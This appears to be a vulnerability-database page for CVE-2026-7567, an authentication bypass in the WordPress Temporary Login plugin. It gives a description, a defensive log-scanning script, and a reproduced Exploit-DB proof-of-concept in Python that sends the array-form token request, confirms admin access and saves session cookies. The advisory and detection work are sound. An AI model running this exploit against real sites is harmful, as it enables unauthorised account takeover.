CVE-2026-7567

critical
Published 2026-05-01 · Modified 2026-05-01
CVSS v3
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS v4 NEW
—
not yet in upstream
VIR risk
10.0

Description

The Temporary Login plugin for WordPress is vulnerable to Authentication Bypass in versions up to and including 1.0.0. This is due to improper input validation in the maybe_login_temporary_user() function, which fails to verify that the 'temp-login-token' GET parameter is a scalar string before processing it. When the parameter is supplied as an array, PHP's empty() check is bypassed and sanitize_key() returns an empty string, which is then passed as the meta_value to get_users(). WordPress ignores an empty meta_value and returns all users matching the meta_key '_temporary_login_token', allowing authentication without a valid token. This makes it possible for unauthenticated attackers to authenticate as any active temporary login user by sending a single crafted GET request.
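
The bypass described above is visible in web-server logs as a request that supplies temp-login-token in PHP array form rather than as a scalar. The following detection script is an added example, not code from the page or the plugin; it assumes Common Log Format lines and uses constructed sample entries.

```python
"""Flag access-log lines that send 'temp-login-token' as a PHP array
(the shape that bypasses the plugin's empty()/sanitize_key() checks)."""
import re
from urllib.parse import parse_qs, urlsplit

# Minimal Common Log Format parser; only the request path is needed.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PARAM = "temp-login-token"


def is_array_form_token(request_path: str) -> bool:
    """True when the query string carries temp-login-token[...] (raw or
    %5B/%5D-encoded). A scalar temp-login-token=value is the benign case."""
    query = urlsplit(request_path).query
    # parse_qs percent-decodes keys and keeps '?temp-login-token[]' (no '=').
    params = parse_qs(query, keep_blank_values=True)
    return any(key.startswith(PARAM + "[") for key in params)


def scan_log(lines):
    """Return (ip, timestamp, path) for every line using the array form."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if m and is_array_form_token(m.group("path")):
            hits.append((m.group("ip"), m.group("ts"), m.group("path")))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2026:10:15:01 +0000] "GET /wp-admin/?temp-login-token[] HTTP/1.1" 302 0',
    '203.0.113.7 - - [02/May/2026:10:15:02 +0000] "GET /wp-admin/?temp-login-token%5B%5D HTTP/1.1" 302 0',
    '198.51.100.4 - - [02/May/2026:10:16:30 +0000] "GET /wp-admin/?temp-login-token=abc123 HTTP/1.1" 302 0',
    '198.51.100.9 - - [02/May/2026:10:17:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, ts, path in scan_log(SAMPLE_LOG):
        print(f"ALERT {ts} {ip} {path}")
```

A 302 on such a request followed by authenticated activity from the same client is the pattern worth escalating; the scalar-token line is expected plugin behaviour and is not flagged.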

Predictions

Exploit likelihood
97%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52575 webapps multiple python · 2 KB
Amir Hossein Jamshidi · 2026-05-26

Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover

Python exploit. Source: Exploit-DB
# Exploit Title: Wordpress Temporary Login Plugin  1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip
# Version: <= 1.0.0
# Tested on: Linux
# CVE : CVE-2026-7567


#!/usr/bin/env python3
import requests

print('''
#################################################################################
#  Temporary Login Plugin <= 1.0.0 - 'temp-login-token' Authentication Bypass   #
#                   BY: Amir Hossein Jamshidi                                   #
#               Mail: amirhosseinjamshidi64@gmail.com                           #
#           github: https://github.com/amirhosseinjamshidi64                    #
#                    Usage: python Exploit.py                                   #
#################################################################################
''')

# Target URL - read interactively; must end with a trailing slash
target = input("Enter Target (example: https://evil.com/): ")
url = target + "wp-admin/?temp-login-token[]"
print("[*] Sending exploit request...")
response = requests.get(url, allow_redirects=True)

print(f"[*] Final URL: {response.url}")
print(f"[*] Response status: {response.status_code}")

# Check if we got admin cookies
if 'wp-settings-time' in str(response.cookies):
    print("[✓] SUCCESS! Authentication bypassed!")
    print("[✓] WordPress logged-in cookie found")
    # Try to access admin area with the same session
    admin_check = requests.get(
        response.url.replace('wp-login.php', 'wp-admin/'),
        cookies=response.cookies
    )
    if 'Dashboard' in admin_check.text or 'wp-admin' in admin_check.url:
        print("[✓] Full admin access confirmed!")
        print("[✓] You are now logged in as a temporary user")
    else:
        print("[!] Logged in but no admin access (user may have limited role)")
else:
    print("[-] Exploit failed. Reasons:")
    print("    - Plugin not installed or not version 1.0.0")
    print("    - No temporary users exist")
    print("    - Plugin is patched")
# Save cookies for manual browsing
with open('wordpress_cookies.txt', 'w') as f:
    for cookie in response.cookies:
        f.write(f"{cookie.name}={cookie.value}\n")
print("[*] Cookies saved to wordpress_cookies.txt")

References

CWEs

CWE-288
